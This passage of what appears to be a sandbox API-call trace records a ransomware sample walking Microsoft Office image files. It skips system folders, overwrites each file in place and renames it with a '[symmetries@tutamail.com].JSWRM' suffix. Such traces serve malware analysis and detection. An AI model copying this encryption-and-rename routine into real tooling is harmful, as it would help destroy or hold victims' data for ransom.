lpWideCharStr="MsPubLogoSmall.contrast-white_scale-140.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-140.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 43 [0133.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.237] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2039) returned 1 [0133.237] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.237] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7f0, lpOverlapped=0x0) returned 1 [0133.246] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.246] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7f0, lpOverlapped=0x0) returned 1 [0133.246] CloseHandle (hObject=0x238) returned 1 [0133.246] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.247] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9b5, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogoSmall.contrast-white_scale-180.png", cAlternateFileName="MSD622~1.PNG")) returned 1 [0133.247] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-180.png", lpString2=".") returned 1 [0133.247] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-180.png", lpString2="..") returned 1 [0133.247] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-180.png", lpString2="...") returned 1 [0133.247] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-180.png", lpString2="windows") returned -1 [0133.247] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0133.247] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0133.247] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0133.247] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.247] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0133.247] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0133.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-180.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-180.png", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 43 [0133.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-180.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-180.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 43 [0133.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.248] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2485) returned 1 [0133.248] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.249] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9b0, lpOverlapped=0x0) returned 1 [0133.263] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.264] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9b0, lpOverlapped=0x0) returned 1 [0133.264] CloseHandle (hObject=0x238) returned 1 [0133.264] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.265] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x62e, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogoSmall.contrast-white_scale-80.png", cAlternateFileName="MS6539~1.PNG")) returned 1 [0133.265] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-80.png", lpString2=".") returned 1 [0133.265] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-80.png", lpString2="..") returned 1 [0133.265] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-80.png", lpString2="...") returned 1 [0133.265] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-80.png", lpString2="windows") returned -1 [0133.265] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0133.265] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0133.265] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0133.265] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.265] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0133.265] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0133.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-80.png", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0133.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-80.png", cchWideChar=42, lpMultiByteStr=0x22d0d8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 42 [0133.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-80.png", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0133.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-80.png", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 42 [0133.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.267] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1582) returned 1 [0133.267] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.267] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x620, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x620, lpOverlapped=0x0) returned 1 [0133.268] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.268] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x620, lpOverlapped=0x0) returned 1 [0133.269] CloseHandle (hObject=0x238) returned 1 [0133.269] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.270] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x739, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogoSmall.scale-100.png", cAlternateFileName="MSA9CC~1.PNG")) returned 1 [0133.273] lstrcmpiW (lpString1="MsPubLogoSmall.scale-100.png", lpString2=".") returned 1 [0133.273] lstrcmpiW (lpString1="MsPubLogoSmall.scale-100.png", lpString2="..") returned 1 [0133.273] lstrcmpiW (lpString1="MsPubLogoSmall.scale-100.png", lpString2="...") returned 1 [0133.273] lstrcmpiW (lpString1="MsPubLogoSmall.scale-100.png", lpString2="windows") returned -1 [0133.273] lstrcmpiW (lpString1="MsPubLogoSmall.scale-100.png", lpString2="recovery") returned -1 [0133.273] lstrcmpiW (lpString1="MsPubLogoSmall.scale-100.png", lpString2="perflogs") returned -1 [0133.273] lstrcmpiW (lpString1="MsPubLogoSmall.scale-100.png", lpString2="documents and settings") returned 1 [0133.273] lstrcmpiW (lpString1="MsPubLogoSmall.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.273] lstrcmpiW (lpString1="MsPubLogoSmall.scale-100.png", lpString2="system volume information") returned -1 [0133.273] lstrcmpiW (lpString1="MsPubLogoSmall.scale-100.png", lpString2="msocache") returned 1 [0133.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-100.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0133.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-100.png", cchWideChar=28, lpMultiByteStr=0x240fe8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 28 [0133.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-100.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0133.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-100.png", cchWideChar=28, lpMultiByteStr=0x240ef8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 28 [0133.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.274] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1849) returned 1 [0133.274] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.274] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x730, lpOverlapped=0x0) returned 1 [0133.276] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.276] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x730, lpOverlapped=0x0) returned 1 [0133.276] CloseHandle (hObject=0x238) returned 1 [0133.276] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.277] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e4, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogoSmall.scale-140.png", cAlternateFileName="MSD79A~1.PNG")) returned 1 [0133.278] lstrcmpiW (lpString1="MsPubLogoSmall.scale-140.png", lpString2=".") returned 1 [0133.278] lstrcmpiW (lpString1="MsPubLogoSmall.scale-140.png", lpString2="..") returned 1 [0133.278] lstrcmpiW (lpString1="MsPubLogoSmall.scale-140.png", lpString2="...") returned 1 [0133.278] lstrcmpiW (lpString1="MsPubLogoSmall.scale-140.png", lpString2="windows") returned -1 [0133.278] lstrcmpiW (lpString1="MsPubLogoSmall.scale-140.png", lpString2="recovery") returned -1 [0133.278] lstrcmpiW (lpString1="MsPubLogoSmall.scale-140.png", lpString2="perflogs") returned -1 [0133.278] lstrcmpiW (lpString1="MsPubLogoSmall.scale-140.png", lpString2="documents and settings") returned 1 [0133.278] lstrcmpiW (lpString1="MsPubLogoSmall.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.278] lstrcmpiW (lpString1="MsPubLogoSmall.scale-140.png", lpString2="system volume information") returned -1 [0133.278] lstrcmpiW (lpString1="MsPubLogoSmall.scale-140.png", lpString2="msocache") returned 1 [0133.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-140.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0133.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-140.png", cchWideChar=28, lpMultiByteStr=0x241358, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 28 [0133.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-140.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0133.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-140.png", cchWideChar=28, lpMultiByteStr=0x2410d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 28 [0133.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.279] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2020) returned 1 [0133.279] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.279] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7e0, lpOverlapped=0x0) returned 1 [0133.281] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.281] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7e0, lpOverlapped=0x0) returned 1 [0133.281] CloseHandle (hObject=0x238) returned 1 [0133.281] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.284] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x982, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogoSmall.scale-180.png", cAlternateFileName="MS99FA~1.PNG")) returned 1 [0133.284] lstrcmpiW (lpString1="MsPubLogoSmall.scale-180.png", lpString2=".") returned 1 [0133.284] lstrcmpiW (lpString1="MsPubLogoSmall.scale-180.png", lpString2="..") returned 1 [0133.284] lstrcmpiW (lpString1="MsPubLogoSmall.scale-180.png", lpString2="...") returned 1 [0133.284] lstrcmpiW (lpString1="MsPubLogoSmall.scale-180.png", lpString2="windows") returned -1 [0133.284] lstrcmpiW (lpString1="MsPubLogoSmall.scale-180.png", lpString2="recovery") returned -1 [0133.284] lstrcmpiW (lpString1="MsPubLogoSmall.scale-180.png", lpString2="perflogs") returned -1 [0133.284] lstrcmpiW (lpString1="MsPubLogoSmall.scale-180.png", lpString2="documents and settings") returned 1 [0133.284] lstrcmpiW (lpString1="MsPubLogoSmall.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.284] lstrcmpiW (lpString1="MsPubLogoSmall.scale-180.png", lpString2="system volume information") returned -1 [0133.284] lstrcmpiW (lpString1="MsPubLogoSmall.scale-180.png", lpString2="msocache") returned 1 [0133.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-180.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0133.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 